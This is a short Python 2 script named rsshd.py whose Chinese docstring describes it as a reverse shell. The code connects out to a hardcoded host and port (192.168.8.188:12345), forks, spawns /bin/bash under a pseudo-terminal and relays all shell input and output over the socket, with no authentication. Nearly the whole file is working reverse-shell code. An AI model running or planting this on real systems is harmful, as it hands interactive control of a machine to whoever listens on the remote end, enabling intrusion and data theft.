rsshd.py

#!/usr/bin/env python
# encoding: utf-8

from __future__ import unicode_literals
from __future__ import print_function

import os
import pty
import socket
import select
import gzip
import cStringIO


'''
Created on 2017年2月21日

@author: Sunday
@summary:
反向shell, sshd
客户端连接服务器，压缩数据后传输
应使用异步机制
不应使用第三方库
尽量兼容python2.6
'''


CHILD = 0


def main():
    client = socket.socket()
    serv_host = ('192.168.8.188', 12345)
    client.connect(serv_host)
    print('connected to remote host.')
    sp1, sp2 = socket.socketpair()
    pid = os.fork()
    if pid == CHILD:
        #sp1.close()
        print('ok, fork to bash...')
        os.dup2(sp2.fileno(), 0)
        os.dup2(sp2.fileno(), 1)
        os.dup2(sp2.fileno(), 2)
        pty.spawn('/bin/bash')
    else:
        #sp2.close()
        poll = select.epoll()
        readmask = select.EPOLLIN | select.EPOLLERR | select.EPOLLHUP
        poll.register(client, readmask)
        poll.register(sp1, readmask)
        while True:
            evts = poll.poll()
            for file_no, evt in evts:
                if file_no == client.fileno():
                    d1 = client.recv(10240)
                    print('client recv. %d' % len(d1))
                    sp1.send(d1)
                elif file_no == sp1.fileno():
                    d1 = sp1.recv(10240)
                    print('sp1 recv. %d' % len(d1))
                    client.send(d1)
                else:
                    print('unknown fileno.')


if __name__ == '__main__':
    main()